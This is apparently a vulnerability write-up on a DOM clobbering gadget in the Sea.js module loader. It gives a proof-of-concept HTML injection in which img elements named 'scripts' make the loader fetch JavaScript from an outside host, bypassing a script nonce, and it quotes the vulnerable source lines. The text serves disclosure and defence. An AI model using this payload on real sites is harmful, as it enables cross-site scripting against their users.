Sea.js is a module loader for the web. It is designed to change the way that you organize JavaScript. With Sea.js, it is pleasure to build scalable web applications.
The Sea.js library uses the src attribute of the last element of document.scripts to load additional scripts.
In the CVE advisory, it mentions version ≤2.2.3, but it looks to work in the latest version (3.0.3).
<!-- user input -->
<img name="scripts">
<img name="scripts" src="https://gmsgadget.com/assets/xss/index.js">
<script nonce="secret" src="https://cdnjs.cloudflare.com/ajax/libs/seajs/3.0.3/sea.js"></script>
<script nonce="secret">
seajs.config({
alias: {
"jquery": "jquery/jquery/1.10.1/jquery.js"
}
});
seajs.use("index");
</script>Root Cause
Source: https://github.com/seajs/seajs/blob/master/src/util-path.js#L231-L247
var doc = document
var scripts = doc.scripts
// Recommend to add `seajsnode` id for the `sea.js` script element
var loaderScript = doc.getElementById("seajsnode") ||
scripts[scripts.length - 1]
function getScriptAbsoluteSrc(node) {
return node.hasAttribute ? // non-IE6/7
node.src :
// see http://msdn.microsoft.com/en-us/library/ms536429(VS.85).aspx
node.getAttribute("src", 4)
}
loaderPath = getScriptAbsoluteSrc(loaderScript)
// When `sea.js` is inline, set loaderDir to current working directory
loaderDir = dirname(loaderPath || cwd)
Related links:
Found by jackfromeast, ishmeals.